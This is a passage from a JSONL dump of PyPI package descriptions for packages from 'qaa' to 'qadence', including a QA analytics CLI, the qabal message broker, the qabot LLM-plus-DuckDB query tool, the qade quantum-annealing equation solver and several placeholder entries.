AnalysisviapipfromPyPI:$pipinstallqaaIf you want to visualize the tutorial notebooks, you can install the extra\ndependencies viapipfromPyPI:$pipinstallqaa[jupyter]UsagePlease see theCommand-line Referencefor details.ContributingContributions are very welcome.\nTo learn more, see theContributor Guide.LicenseDistributed under the terms of theBSD 3 Clause license,Quasi-Anharmonic Analysisis free and open source software.IssuesIf you encounter any problems,\npleasefile an issuealong with a detailed description.CreditsThis project was generated from@cjolowicz\u2019sHypermodern Python Cookiecuttertemplate."} +{"package": "qaamus", "pacakge-description": "UNKNOWN"} +{"package": "qa-analytics-insights", "pacakge-description": "OverviewThis repository hosts the source code for theQA Analytics Insightsproject,\na robust command-line interface (CLI) tool designed to generate data-driven\ninsights from QA (Quality Assurance) test results. 
Test results are typically\ngenerated in XML format by test automation frameworks such aspytestandunittest.FeaturesAnalyze test results in XML format.Generate visualizations and metrics to better understand test performance.Create actionable insights to improve QA processes.Command line toolThe command line tool can be used to generate insights from the tests results\nin xml format.The tool can be used as follows:$ qa-analytics-insights --help\nUsage: qa-analytics-insights -f [-o ] [-vv] [-h] [-v]The tool accepts the following arguments:-for\u2013file: Path to the file containing the tests results in xml format.-oor\u2013output: Path to the directory where the insights will be generated.-vvor\u2013verbose: Enable verbose mode.-vor\u2013version: Show version and exit.-hor\u2013help: Show help message and exit.LibraryThe library can be used to generate insights from the tests result in xml\nformat.The library can be used as follows:from qa_analytics_insights.result_analyzer import ResultAnalyzer\nanalyzer = ResultAnalyzer(\n test_results_file_path='path/to/test/results/file.xml',\n output_dir='path/to/output/dir',\n)InstallationTo install the package frompypi, run the following command:$ pip install qa-analytics-insightsDevelopmentTo install the package in development mode, run the following command:# create a virtual environment\n$ virtualenv -p python3 venv\n\n# activate the virtual environment\n$ source venv/bin/activate\n\n# Run the package in development mode\n$ hatch run develop:allFor linting, run the following command:$ hatch run linter:linterfor building the package, run the following command:$ hatch buildfor generating the documentation, run the following command:$ hatch run docs:allfor running the tests with coverage, run the following command:$ hatch run default:all"} +{"package": "qa-annotator", "pacakge-description": "QA-Annotator: Annotation Is All You NeedAbout The ProjectMaking the mammoth task of data annotation for an NLP-based Question-Answering system hassle-free. Just jump right in and start annotating!Getting StartedInstallationInstall with pip (python 3 required)$pipinstallQA-AnnotatorStart the server$annotatorContributingContributions, suggestions are welcomed! :)If you like the project, Don't forget to give a star! Thanks!LicenseDistributed under the MIT License. SeeLICENSE.txtfor more information.ContactPrateek Yadav -@impyadav_LinksProject Link:https://pypi.org/project/QA-Annotator/"} +{"package": "qabal", "pacakge-description": "Qabal is a simple and fast open source content-based message broker. Use\nQabal to organize all your multi-stage analytical workloads.Qabal has no install dependencies outside of the default Python runtime.\nUse it on your Raspberry Pi, laptop, or 100 node Dask cluster. Routing\ndecisions in Qabal take constant time, so you can use it for complex\nmultistage analytics with thousands of steps. It\u2019s lightweight, simple\nto understand, easy to integrate with distributed task libraries (eg.\nDask) and fast to execute. It has configurable full pipeline data\nprovenance. In extended provenance mode, Qabal records when every data\nitem is added or updated by what analytic and at what time.Qabal analytics need not be aware that they are part of a message broker\npipeline. They don\u2019t need to depend or import any Qabal library. 
The\ndata structure used in routing extends the standard Python dictionary.\nQabal comes with ready to use reflection-based content injection, giving\nusers flexibility on the API of their analytics.Installationpip install qabalTry It For YourselfQabal has a simple API that revolves around attaching functions to a\nSession object.You define routes in Qabal using a query DSL that resembles Python\nconditional statements. These get \u201ccompiled\u201d into more traditional\nmessage broker routes.fromqabalimportSession,Itemdeffoo(item):item['foo']='foo'returnitemdefbar(item):item['bar']='bar'returnitemdefbaz(item):item['baz']='baz'returnitemdefbar_baz(item):item['bar']='bar!'item['baz']='baz!'returnitemdefparameters_are_okay_too(foo,bar):return{'baz':foo+bar}# If your trigger query doesn't use the Qabal query language, an analytic need not even depend on Qabal.classAnalyticWithMetadata:__trigger__=Item['baz']=='baz!'__inject__=True__creates__='qux'def__call__(self,baz):returnbaz+'?'example=AnalyticWithMetadata()# Despite all the Qabal metadata, this analytic still maintains a normal API.print(example('hello'))# Outputs: 'hello?'sess=Session(provenance='extended')# Qabal records a ton of information in this mode.sess.add(foo,Item['type']=='foo')sess.add(bar,Item['foo']=='foo')res=sess.feed({'type':'foo'})print(res)print(res.provenance)# The session is mutable at any time.handle=sess.add(bar_baz,Item['bar']=='bar')res=sess.feed({'type':'foo'})sess.remove(handle)print(res)sess.add(bar_baz,Item['bar']=='bar')# Analytics with metadata don't need a routesess.add(example)res=sess.feed({'type':'foo'})print(res)"} +{"package": "qab-core", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qablet", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qablet-basic", "pacakge-description": "No description available on PyPI."} +{"package": "qablet-contracts", "pacakge-description": "qablet_contractsQablet Contracts documentation is atqablet.github.io/qablet-contracts.A Qablet timetable defines a financial product using a sequence of payments, choices and conditions. A valuation model implemented with a Qablet parser can value any contract, as long as the contract can be described using a Qablet Timetable.This repositary contains code to create qablet timetables.\nIt does not contain models that price qablet timetables. 
Such models will be available in other independent projects.Install it from PyPIpipinstallqablet_contracts"} +{"package": "qaboard", "pacakge-description": "Experiment tracking framework with advanced viewers.Helps algo/ml/perf engineers share results, collaborate, and build better products.FeaturesOrganize, View and Compare Results,Tuning/OptimizationWeb-based,with sharable URLs.Visualizations:support for quantitative metrics, and many file formats: advanced image viewer, support for videos, plotly graphs, flame graphs, text, pointclouds, HTML...Integrations:direct access from Git and CI tools, easily exportable results, API, links to the code, trigger gitlabCI/jenkins/webhooks...Agnosticto your language/framework: run your existing code, write files, view them.For screenshots checkour website.BenefitsQA-Board across many projects enables us to:Scale R&D:enable engineers to achieve more and be more productive.Faster Time-to-Market:collaboration across teams, workflow integration..Quality:uncover issues earlier, KPIs, tuning, reporting...Getting StartedRead the docs!You will learn how to:Start a QA-Board serverWrap your code with QA-BoardView output files and KPIs...and setup parameter tuning, integrations with 3rd party tools, etc.If you want to learn about the code's organization, or how to contribute, readCONTRIBUTING.mdFeedback? Questions? Need Help? Found a bug?Don't hesitate to get in touch! Contactarthur.flam@samsung.com, we'll be delighted to hear your insights.If you've got questions about setup, deploying, want to develop new features, or just want to chat with the developers, please feel free tostart a thread in our Spectrum community!Found a bug with QA-Board? Go ahead andsubmit an issue. And, of course, feel free to submit pull requests with bug fixes or changes to themasterbranch.ContributorsQA-Board was started atSamsung SIRCbyArthur Flam.Thanks to the following people for their contributions, testing, feedback or bug reports: Amir Fruchtman, Avi Schori, Yochay Doutsh, Itamar Persi, Amichay Amitay, Lena Grechikhin, Shai Shamir, Matan Danino, Roy Shaul, Gal Hai, Rivka Emanuel, Ela Shahar, Nadav Ofer, David Nukrai. Thanks also to Sebastien Derhy, Elad Rozin, Nathan Levy, Shahaf Duenyas, Yotam Ater, Asaf Jazcilevich and Yoel Yaffe for supporting the project.You don't see your name? Get in touch to be added to the list!CreditsThe logo is a the Poodletwemoji\ud83d\udc29, recolored in Samsung Blue \ud83d\udd35.Copyright 2019 Twitter, Inc and other contributors. Code licensed under theMIT License. 
Graphics licensed underCC-BY 4.0"} +{"package": "qabot", "pacakge-description": "qabotQuery local or remote files with natural language queries powered by\nOpenAI'sgptandduckdb\ud83e\udd86.Can query Wikidata, local and remote files.InstallationInstall withpipx:pipx install qabotCommand Line Usage$EXPORTOPENAI_API_KEY=sk-...\n$EXPORTQABOT_MODEL_NAME=gpt-4\n$qabot-w-q\"How many Hospitals are there located in Beijing\"Query:HowmanyHospitalsaretherelocatedinBeijing\nThereare39hospitalslocatedinBeijing.\nTotaltokens1749approximatecostinUSD:0.05562Python Usagefromqabotimportask_wikidata,ask_fileprint(ask_wikidata(\"How many hospitals are there in New Zealand?\"))print(ask_file(\"How many men were aboard the titanic?\",'data/titanic.csv'))Output:There are 54 hospitals in New Zealand.\nThere were 577 male passengers on the Titanic.FeaturesWorks on local CSV files:remote CSV files:$ qabot -f https://duckdb.org/data/holdings.csv -q \"Tell me how many Apple holdings I currently have\"\n \ud83e\udd86 Creating local DuckDB database...\n \ud83e\udd86 Loading data...\ncreate view 'holdings' as select * from 'https://duckdb.org/data/holdings.csv';\n \ud83d\ude80 Sending query to LLM\n \ud83e\uddd1 Tell me how many Apple holdings I currently have\n\n\n \ud83e\udd16 You currently have 32.23 shares of Apple.\n\n\nThis information was obtained by summing up all the Apple ('APPL') shares in the holdings table.\n\nSELECT SUM(shares) as total_shares FROM holdings WHERE ticker = 'APPL'Even on (public) data stored in S3:You can even load data from disk/URL via the natural language query:Load the file 'data/titanic.csv' into a table called 'raw_passengers'.\nCreate a view of the raw passengers table for just the male passengers. What\nwas the average fare for surviving male passengers?~/Dev/qabot> qabot -q \"Load the file 'data/titanic.csv' into a table called 'raw_passengers'. Create a view of the raw passengers table for just the male passengers. What was the average fare for surviving male passengers?\" -v\n \ud83e\udd86 Creating local DuckDB database...\n \ud83e\udd16 Using model: gpt-4-1106-preview. Max LLM/function iterations before answer 20\n \ud83d\ude80 Sending query to LLM\n \ud83e\uddd1 Load the file 'data/titanic.csv' into a table called 'raw_passengers'. Create a view of the raw passengers table for just the male passengers. What was the \naverage fare for surviving male passengers?\n \ud83e\udd16 load_data\n{'files': ['data/titanic.csv']}\n \ud83e\udd86 Imported with SQL:\n[\"create table 'titanic' as select * from 'data/titanic.csv';\"]\n \ud83e\udd16 execute_sql\n{'query': \"CREATE VIEW male_passengers AS SELECT * FROM titanic WHERE Sex = 'male';\"}\n \ud83e\udd86 No output\n \ud83e\udd16 execute_sql\n{'query': 'SELECT AVG(Fare) as average_fare FROM male_passengers WHERE Survived = 1;'}\n \ud83e\udd86 average_fare\n40.82148440366974\n \ud83e\udd86 {\"summary\": \"The average fare for surviving male passengers was approximately $40.82.\", \"detail\": \"The average fare for surviving male passengers was\ncalculated by creating a view called `male_passengers` to filter only the male passengers from the `titanic` table, and then running a query to calculate the \naverage fare for male passengers who survived. 
The calculated average fare is approximately $40.82.\", \"query\": \"CREATE VIEW male_passengers AS SELECT * FROM \ntitanic WHERE Sex = 'male';\\nSELECT AVG(Fare) as average_fare FROM male_passengers WHERE Survived = 1;\"}\n\n\n \ud83d\ude80 Question:\n \ud83e\uddd1 Load the file 'data/titanic.csv' into a table called 'raw_passengers'. Create a view of the raw passengers table for just the male passengers. What was the \naverage fare for surviving male passengers?\n \ud83e\udd16 The average fare for surviving male passengers was approximately $40.82.\n\n\nThe average fare for surviving male passengers was calculated by creating a view called `male_passengers` to filter only the male passengers from the `titanic` \ntable, and then running a query to calculate the average fare for male passengers who survived. The calculated average fare is approximately $40.82.\n\nCREATE VIEW male_passengers AS SELECT * FROM titanic WHERE Sex = 'male';\nSELECT AVG(Fare) as average_fare FROM male_passengers WHERE Survived = 1;QuickstartYou need to set theOPENAI_API_KEYenvironment variable to your OpenAI API key,\nwhich you can get fromhere.Install theqabotcommand line tool using pip/pipx:$pipinstall-UqabotThen run theqabotcommand with either local files (-f my-file.csv) or-wto query wikidata.ExamplesLocal CSV file/s$qabot-q\"how many passengers survived by gender?\"-fdata/titanic.csv\n\ud83e\udd86Loadingdatafromfiles...\nLoadingdata/titanic.csvintotabletitanic...\n\nQuery:howmanypassengerssurvivedbygender?\nResult:\nTherewere233femalepassengersand109malepassengerswhosurvived.\ud83d\ude80anyfurtherquestions?[y/n](y):y\ud83d\ude80Query:whatwasthelargestfamilywhodidnotsurvive?Query:whatwasthelargestfamilywhodidnotsurvive?\nResult:\nThelargestfamilywhodidnotsurvivewastheSagefamily,with8members.\ud83d\ude80anyfurtherquestions?[y/n](y):nQuery WikiDataUse the-wflag to query wikidata. For best results use agpt-4or similar model.$EXPORTQABOT_MODEL_NAME=gpt-4\n$qabot-w-q\"How many Hospitals are there located in Beijing\"Intermediate steps and database queriesUse the-vflag to see the intermediate steps and database queries.\nSometimes it takes a long route to get to the answer, but it's interesting to see how it gets there.qabot -f data/titanic.csv -q \"how many passengers survived by gender?\" -vData accessed via http/s3Use the-f flag to load data from a url, e.g. a csv file on s3:$qabot-fs3://covid19-lake/enigma-jhu-timeseries/csv/jhu_csse_covid_19_timeseries_merged.csv-q\"how many confirmed cases of covid are there?\"-v\n\ud83e\udd86Loadingdatafromfiles...\ncreatetablejhu_csse_covid_19_timeseries_mergedasselect*from's3://covid19-lake/enigma-jhu-timeseries/csv/jhu_csse_covid_19_timeseries_merged.csv';Result:264308334confirmedcasesIdeasstreaming mode to output results as they come intoken limitsSupervisor agent - assess whether a query is \"safe\" to run, could ask for user confirmation to run anything that gets flagged.Often we can zero-shot the question and get a single query out - perhaps we try this before the MKL chaintest each zeroshot agent individuallyGenerate and pass back assumptions made to the userAdd an optional \"clarify\" tool to the chain that asks the user to clarify the questionCreate a query checker tool that checks if the query looks valid and/or safeInject AWS credentials into duckdb so we can access private resources in S3Automatic publishing to pypi. 
Look athttps://blog.pypi.org/posts/2023-04-20-introducing-trusted-publishers/"} +{"package": "qacaller", "pacakge-description": "params ,metrics, log"} +{"package": "qackorm", "pacakge-description": "QUANTAXIS Financial Framework"} +{"package": "qacode", "pacakge-description": "BranchLinux DeployWindows DeployCircleCI - DockerCodeClimatemasterPython tested versions3.73.63.5<=3.4SupportedSupportedSupportedNot SupportedHow to install ?Install from PIP :pip install qacodeInstall from setup.py file :python setup.py installDocumentationHow to use library, searching forUsage Guideor auto updatedQAcode\u2019s Documentation.https://netzulo.github.io/How to exec tests ?Tests from setup.py file :python setup.py testInstall from PIP file :pip install toxTests from tox :tox-l&& tox-eTOX_ENV_NAME(see tox.ini file to get environment names)TOX Env nameEnv descriptionpy35,py36,py37Python supported versionsflake8Exec linter in qalab/ tests/coverageGenerate XML and HTML reportsdocsGenerate doc HTML in /docsConfiguration File{\n \"bot\": {\n \"log_output_file\": \"logs/\",\n \"log_name\": \"qacode\",\n \"log_level\": \"DEBUG\",\n \"mode\": \"remote\",\n \"browser\": \"chrome\",\n \"options\": { \"headless\": false },\n \"url_hub\": \"http://localhost:11000/wd/hub\",\n \"drivers_path\": \"../qadrivers\",\n \"drivers_names\": [\n \"chromedriver_32.exe\",\n \"chromedriver_64.exe\",\n \"chromedriver_32\",\n \"chromedriver_64\",\n \"firefoxdriver_32.exe\",\n \"firefoxdriver_64.exe\",\n \"firefoxdriver_64.exe\",\n \"firefoxdriver_32\",\n \"phantomjsdriver_32.exe\",\n \"phantomjsdriver_64.exe\",\n \"phantomjsdriver_32\",\n \"phantomjsdriver_64\",\n \"iexplorerdriver_32.exe\",\n \"iexplorerdriver_64.exe\",\n \"edgedriver_32.exe\",\n \"edgedriver_64.exe\"\n ]\n }\n}Getting StartedJust starting example of usage before readUsage Guide(or refer to `QAcode\u2019s Documentation`_).fromqacode.core.bots.bot_baseimportBotBasefromqacode.core.webs.controls.control_baseimportControlBasefromqacode.utilsimportsettingsSETTINGS=settings(file_path=\"/home/user/config/dir/\",file_name=\"settings.json\")try:bot=BotBase(**SETTINGS)bot.navigation.get_url(\"http://the-internet.herokuapp.com/login\")ctl_config={\"selector\":\"input[name='username']\"}ctl=ControlBase(bot,**ctl_config)# ENDimportpdb;pdb.set_trace()# TODO, remove DEBUG laneprint(ctl)exceptExceptionaserr:print(\"ERROR:{}\".format(err))finally:bot.close()"} +{"package": "qaczar", "pacakge-description": "No description available on PyPI."} +{"package": "qadabra", "pacakge-description": "Qadabra:QuantitativeAnalysis ofDifferentialAbundanceRanks(Pronouncedka-da-bra)Qadabra is a Snakemake workflow for running and comparing several differential abundance (DA) methods on the same microbiome dataset.Importantly, Qadabra focuses on both FDR corrected p-valuesandfeature ranksand generates visualizations of differential abundance results.Please note this software is currently a work in progress. Your patience is appreciated as we continue to develop and enhance its features. 
Please leave an issue on GitHub should you run into any errors.InstallationOption 1: Pip install fromPyPIpip install qadabraQadabra requires the following dependencies:snakemakeclickbiom-formatpandasnumpycythoniowCheck out thetutorialfor more in-depth instructions on installation.Option 2: Install from source (this GitHub repository)PrerequisitesBefore you begin, ensure you have Git and the necessary build tools installed on your system.Clone the Repositorygit clone https://github.com/biocore/qadabra.gitNavigate to repo root directory where thesetup.pyfile is located and then install QADABRA in editable modecd qadabra\npip install -e .Usage1. Creating the workflow directoryQadabra can be used on multiple datasets at once.\nFirst, we want to create the workflow directory to perform differential abundance with all methods:qadabra create-workflow --workflow-dest This command will initialize the workflow, but we still need to point to our dataset(s) of interest.2. Adding a datasetWe can add datasets one-by-one with theadd-datasetcommand:qadabra add-dataset \\\n --workflow-dest \\\n --table /data/table.biom \\\n --metadata /data/metadata.tsv \\\n --tree /data/my_tree.nwk \\\n --name my_dataset \\\n --factor-name case_control \\\n --target-level case \\\n --reference-level control \\\n --confounder confounding_variable(s) \\\n --verboseLet's walkthrough the arguments provided here, which represent the inputs to Qadabra:workflow-dest: The location of the workflow that we created earliertable: Feature table (features by samples) inBIOMformatmetadata: Sample metadata in TSV formattree: Phylogenetic tree in .nwk or other tree format (optional)name: Name to give this datasetfactor-name: Metadata column to use for differential abundancetarget-level: The value in the chosen factor to use as the targetreference-level: The reference level to which we want to compare our targetconfounder: Any confounding variable metadata columns (optional)verbose: Flag to show all preprocessing performed by QadabraYour dataset should now be added as a line inmy_qadabra/config/datasets.tsv.You can useqadabra add-dataset --helpfor more details.\nTo add another dataset, just run this command again with the new dataset information.3. Running the workflowThe previous commands will create a subdirectory,my_qadabrain which the workflow structure is contained.\nFrom the command line, execute the following to start the workflow:snakemake --use-conda --cores Please read theSnakemake documentationfor how to run Snakemake best on your system.When this process is completed, you should have directoriesfigures,results, andlog.\nEach of these directories will have a separate folder for each dataset you added.4. Generating a reportAfter Qadabra has finished running, you can generate a Snakemake report of the workflow with the following command:snakemake --report report.zipThis will create a zipped directory containing the report.\nUnzip this file and open thereport.htmlfile to view the report containing results and visualizations in your browser.TutorialSee thetutorialpage for a walkthrough on using Qadabra workflow with a microbiome dataset.FAQsComing soon: AnFAQspage of commonly asked question on the statistics and code pertaining to Qadabra.CitationThe manuscript for Qadabra is currently in progress. Please cite this GitHub page if Qadabra is used for your analysis. This project is licensed under the BSD-3 License. 
See thelicensefile for details."} +{"package": "qad-api", "pacakge-description": "The QAD-API Python libraryThe QAD-API Python library is a library for accessing the (REST) API ofQAD Cloud.NoteAs this library serves simply as a Python front-end to the QAD Cloud,\nyou will first need an account on this platform, before using the library.InstallationWe do not yet provide a PyPi package. The recommended method for installing\nQAD-API is to clone the following repository, and then \"pip install\" it\nfrom the appropriate local folder:gitclonehttps://github.com/HQSquantumsimulations/qad-api.git\npipinstall-eqad-apiUsageThe QAD-API is utilized by importing the classQAD_APIfrom the root packageqad_api. In order access the API, one must create an instance of this class.To learn more about the API functionality, please refer to thedocumentation of QAD_API.ExampleTo get started with the QAD_API, we provide a quick and simple example here.\nYou also find this example in the folderexamples/lattice.We will create an instance ofQAD_API, which will authenticate the user\nwith the back-end. The first time this is done, the user will be asked\nto open a link in a browser and use their credentials to authenticate\nwith the back-end (OAuth2).After this, we use the instance ofQAD_APIto access the API functionality.\nWe create a unit-cell and a system for the lattice-based problem solver \"SCCE,\"\nand also create a job for that solver by passing the recently created handlers,\nthen wait for the job to finish. This will take some time, after which we\ndownload the results file to the local file system.fromqad_apiimportQAD_API# Creating an QAD_API instance will authenticate the user with the backendqad=QAD_API()# Create a unit-cellunit_cell=qad.lattice.unit_cells.create('1D XXZ',{\"unitcell\":{\"atoms\":[# eps U['0','A',[0,0,0],0.0001,0.0],['1','B',[0.5,0,0],-0.0001,0.0]],\"bonds\":[# t U['0','0',[1,0,0],-1.0,0.0]],\"lattice_vectors\":[[1,0,0]]}})print(f\"Unit cell created:{unit_cell.id}\")# Create a systemsystem=qad.lattice.systems.create('1D XXZ',{\"system\":{\"cluster_size\":[14,1,1],# measured in unit cells\"system_size\":[2,1,1],# measured in clusters\"cluster_offset\":[0,0,0],# measured in clusters\"system_boundary_condition\":\"periodic\"}})print(f\"System created:{system.id}\")# Create a job (will start to run it automatically)job=qad.lattice.scce.jobs.create('1D XXZ',unit_cell,system)print(f\"Job created:{job.id}\")# Wait for the job to be done (when using co-routines: await job.wait())job.wait_blocking()# Download the result to a local filejob.download_result(f\"./{job.id}.h5\")print(\"Downloaded result\")"} +{"package": "qa-data-manager", "pacakge-description": "\u0411\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u0442\u0435\u0441\u0442\u043e\u0432"} +{"package": "qadbengine", "pacakge-description": "QUANTAXIS Financial Framework"} +{"package": "qade", "pacakge-description": "Adifferential equationsolver usingquantum annealing. It can be applied to coupled linear ODEs and PDEs with variable coefficients and inhomogeneous terms. 
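To make the supported problem class concrete (this is a generic textbook form, not a formula taken from the qade documentation), a single linear ODE of order K with variable coefficients a_k(x) and inhomogeneous term g(x) can be written as

$$\sum_{k=0}^{K} a_k(x)\,\frac{d^k f}{dx^k}(x) + g(x) = 0,$$

where coupled systems replace f and g by vectors and the a_k(x) by matrices, and PDEs replace the ordinary derivatives by partial derivatives in several variables.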
The solution is obtained by finding the optimal weights for a linear combination of \"basis functions\":The problem can then be viewed as a minimization one, for the loss functionwhere E is the equation to be solved, B are the initial/boundary conditions, and the x are the sample points at which they must hold. From this perspective, there is no difference between the equation and the boundary conditions, and they are treated on an equal footing. The loss function is then translated into anIsing modelHamiltonian by means of abinary encodingfor the weights and solved in a quantum annealer.Solutions obtained with qade for the wave equation and a system of coupled first order ODEs (see theexamplesdirectory):ContentsInstallationUsage exampleDocumentationqade.functionqade.basisqade.equationqade.solveInspecting the loss functionCitationInstallation> pip install qadeThis will install the dependenciesnumpyanddwave-ocean-sdkif not present. Python version 3.7 or higher is required. In order forqadeto send the problem for solution in the D-Wave systems, theAPI tokenneeds to beconfigured.Usage exampleAs an example, we can solve the Laguerre equation in the[0, 1]interval with boundary conditions at the extremes:whereL_nis the nth Laguerre polynomial. To do so, we parametrize the solution as a linear combination of the first few powers of x, and look for the optimal values of the weights such that the equation is satisfied at a set of sample points. This can be done through:importnumpyasnpfromscipy.specialimporteval_laguerreasLimportqaden=4# Laguerre equation parameterx=np.linspace(0,1,20)# Sample points at which the equation is to be evaluatedy=qade.function(n_in=1,n_out=1)# Define the function to be solved for# Define the equation and boundary conditionseq=qade.equation(x*y[2]+(1-x)*y[1]+n*y[0],x)bcs=qade.equation(y[0]-[1,L(n,1)],[0,1])# Solve the equation using as the basis of functions the monomials [1, x, x^2, x^3]y_sol=qade.solve([eq,bcs],qade.basis(\"monomial\",4),scales=(n-2),num_reads=500)This illustrates the use of the 4 main functions provided by qade:qade.function(n_in, n_out)defines a symbolic functionyofn_ininputs andn_outoutputs, whose nth derivative is denoted asy[n].qade.equation(eq, samples)defines an equation of the formeq == 0, withsamplesbeing an array-like object containing sample points at which it holds.qade.basis(name, size_per_dim, ...)defines the basis of functions in terms of which the solution will be written.qade.solve(eqs, basis, ...)uses a binary encoding to represent the problem of solving the given equations in the given basis as an Ising model, sends it to a D-Wave quantum annealer, and collects it into aSolutionobjecty_sol.We can now print the weights of the basis functions in the solution and the corresponding through:print(f\"loss ={y_sol.loss:.3}, weights ={y_sol.weights}\")We can also evaluate the solution at any set of points, plot the results, and compare to the analyical solution, the which is nth Laguerre polynomial:importmatplotlib.pyplotaspltplt.plot(x,y_sol(x),linewidth=5)plt.plot(x,L(n,x),color=\"black\",linestyle=\"dashed\")plt.show()For other examples, see theexamplesdirectory. An example PDE, the wave equation, is solved inwave.py. A system of coupled first-order ODEs is solved incoupled.py.Documentationqade.functionCreatesFunctionobjects, to be used in definition of the equations. The arguments are:n_in: int. The number of input variables of the function, i.e. the dimension of the domain.n_out: int. The number of output variables of the function, i.e. 
the dimension of the target space. Forn_out == 1,qade.functionreturns a singleFunction. Forn_out > 1, it returns list ofFunctionobjects, one for each output component.A differential equation or boundary condition is then defined as a linear combination of the derivatives of the functions, plus possible an inhomogeneous term, with coefficients and inhomogeneous term being either scalars or flat array-like objects (numpy arrays, lists, ...) having the same length as the set of sample points at which the equation is evaluated. The examples show how this is done in different practical settings. The notationf[k1, ..., kn]represents the following expression:qade.equationCreates anEquation, representing any linear differential equation or boundary condition. The arguments are:formula. The expression for the equation, constructed as a linear combination of derivativesf[k1, ..., kn]ofFunctionobjects, plus the optional inhomogeneous term.samples, an array-like object of shape(n_samples, n_in)(or just(n_samples,), ifn_in == 1). Defines the sample points from the domain in which the equation must hold.qade.basisCreates aBasis, representing the functions to be linearly combined into the solution. The arguments are:name: str. The allowed names are:\"fourier\". A product of the following functions for each componentxin the input space:\"monomial\". A product of the following functions for each componentxin the input space:\"trig\". A product of the following functions for each componentxin the input space:\"gaussian\". The following functions of the distancerto each pointx_nin an equally-spaced grid in the input space (which is assumed to be the box[0, 1]^n_in):\"multiquadric\". The following functions of the distancerto each pointx_nin an equally-spaced grid in the input space (which is assumed to be the box[0, 1]^n_in):size_per_dim: int. The number of functions to use per input variable. The total dimension of the basis will besize_per_dim ** n_in.n_in: int. Only used by the radial basis functions\"gaussian\"and\"multiquadric\"to create the grid of points in the domain.scale: float. The lambda scale parameter of the radial basis functions\"gaussian\"and\"multiquadric\".Custom basesCustom bases can be provided by the user. In this case, instead of usingqade.basis, the user should define a class implementing the methods:dimension(self, n_in: int) -> int. Returning the total number of functions in the basis.derivatives(self, k: int, samples: np.ndarray) -> np.ndarray. Returning the array of kth derivatives of the basis functions at the given sample points, received as an array of shape(n_samples, n_in). The output array should have shape:(n_samples, n_out) + (n_in,) * k.qade.solveSolves the given equations and returns aSolutionobject. The arguments are:equations: List[Equation]. The equations to be solved, including initial/boundary conditions.basis: Basis. The basis to be used in their solution.n_spins: int = 3. The number of spins per weight in the binary encoding.n_epochs: int = 10. The number of epochs in which the problem is solved, using the values obtained in the previous epoch as the center values in the binary encoding of the weights.scale_factor: float = 0.5. The relative change in the scale in the binary encoding of the weights from one epoch to the next.anneal_schedule: Optional[List[Tuple[int, int]]] = None. The schedule to be used by the quantum annealer. See D-Wave Ocean Tools'documentationfor details. 
IfNone, it will default to a linear schedule of the form[(0, 0), (200, 0)].num_reads: int = 200. The number of reads to be performed by the quantum annealer.qpu_solver: str = \"Advantage_system4.1\". The QPU to be used.centers: ArrayLike = 0. The initial central values in the binary encoding of the weights. Must be a scalar or an array of sizen_out * basis_dim.scales: ArrayLike = 1. The initial scales in the binary encoding of the weights. Must be a scalar or an array of sizen_out * basis_dim.verbose: bool = False. Determines if information about intermediate steps should be printed.classical_minimizer: Optional[Callable[[Callable[[np.ndarray], float]], np.ndarray]] = None. If notNone, a classical function to be used in place of the quantum procedure for minimizing the loss function, for testing purposes.Solution objectsReturn type ofqade.solve. They are callables that receive an array-like object of sample points, with shape(n_samples, n_in)(or just(n_samples,), ifn_in == 1), and return the corresponding values of the solution, as a numpy array of shape(n_samples, n_out). Their attributes are:basis: Basis. The basis in terms of which the solution has been obtained.weights: np.ndarray, with shape(n_out, n_in). The optimal weights providing the solution as a linear combination of the basis functions.loss: float. The value of the loss function at the given weights.Inspecting the loss functionTwo functions are provided to obtain the internal parameters of the loss function, both as a quadratic function of the real-valued weights, and as an Ising model Hamiltonian in the annealer spins.qade.lossReturns the(J, h)parameters of the quadratic loss functionQ(w) = w^T J w + h^T w, wherewis the flattened array of the continuous weights. The arguments areequations: List[Equation]. The equations to be included.basis: Basis. The basis to be used in their solution.qade.isingReturns the(J, h)parameters of the Ising model HamiltonianH(w) = w^T J w + h^T w, wherewis the flattened array of spins. The arguments are:equations: List[Equation]. The equations to be included.basis: Basis. The basis to be used in their solution.n_spins: int = 3. The number of spins per weight in the binary encoding.centers: ArrayLike = 0. The initial central values in the binary encoding of the weights. Must be a scalar or an array of sizen_out * basis_dim.scales: ArrayLike = 1. The initial scales in the binary encoding of the weights. 
Must be a scalar or an array of sizen_out * basis_dim.CitationIf you use qade, please cite:"} +{"package": "qadeepdf", "pacakge-description": "This is a decscription files that is use for install the package"} +{"package": "qadeeraaa", "pacakge-description": "this is a demo\npls don\u2019t download"} +{"package": "qadeerpackage", "pacakge-description": "this is a demo\npls don\u2019t download"} +{"package": "qadeerpackages", "pacakge-description": "this is a demo\npls don\u2019t download"} +{"package": "qadeerpdf", "pacakge-description": "this is a demo\npls don\u2019t download"} +{"package": "qadence", "pacakge-description": "For a high-level overview of Qadence features,check out our white paper.For more detailed information,check out the documentation.Qadenceis a Python package that provides a simple interface to builddigital-analog quantum\nprogramswith tunable qubit interaction defined onarbitrary register topologiesrealizable on neutral atom devices.Feature highlightsAblock-based systemfor composingcomplex digital-analog\nprogramsin a flexible and scalable manner, inspired by the Julia quantum SDKYao.jland functional programming concepts.Asimple interfaceto work withinteracting neutral-atom qubit systemsusingarbitrary registers topologies.An intuitiveexpression-based systemdeveloped on top of the symbolic librarySympyto constructparametric quantum programseasily.High-order generalized parameter shift rulesfordifferentiating parametrized quantum operations.Out-of-the-boxautomatic differentiabilityof quantum programs withPyTorchintegration.Efficient executionon a variety of different purpose backends: from state vector simulators to tensor network emulators and real devices.Installation guideQadence is available onPyPIand can be installed usingpipas follows:pipinstallqadenceThe default, pre-installed backend for Qadence isPyQTorch, a differentiable state vector simulator for digital-analog simulation based onPyTorch. It is possible to install additional,PyTorch-based backends and the circuit visualization library using the following extras:pulser: ThePulserbackend for composing, simulating and executing pulse sequences for neutral-atom quantum devices.braket: TheBraketbackend, an open source library that provides a framework for interacting with quantum computing hardware devices through Amazon Braket.visualization: A visualization library to display quantum circuit diagrams.Qadence also supports aJAXengine which is currently supporting theHorqruxbackend.horqruxis currently only available via thelow-level API.To install 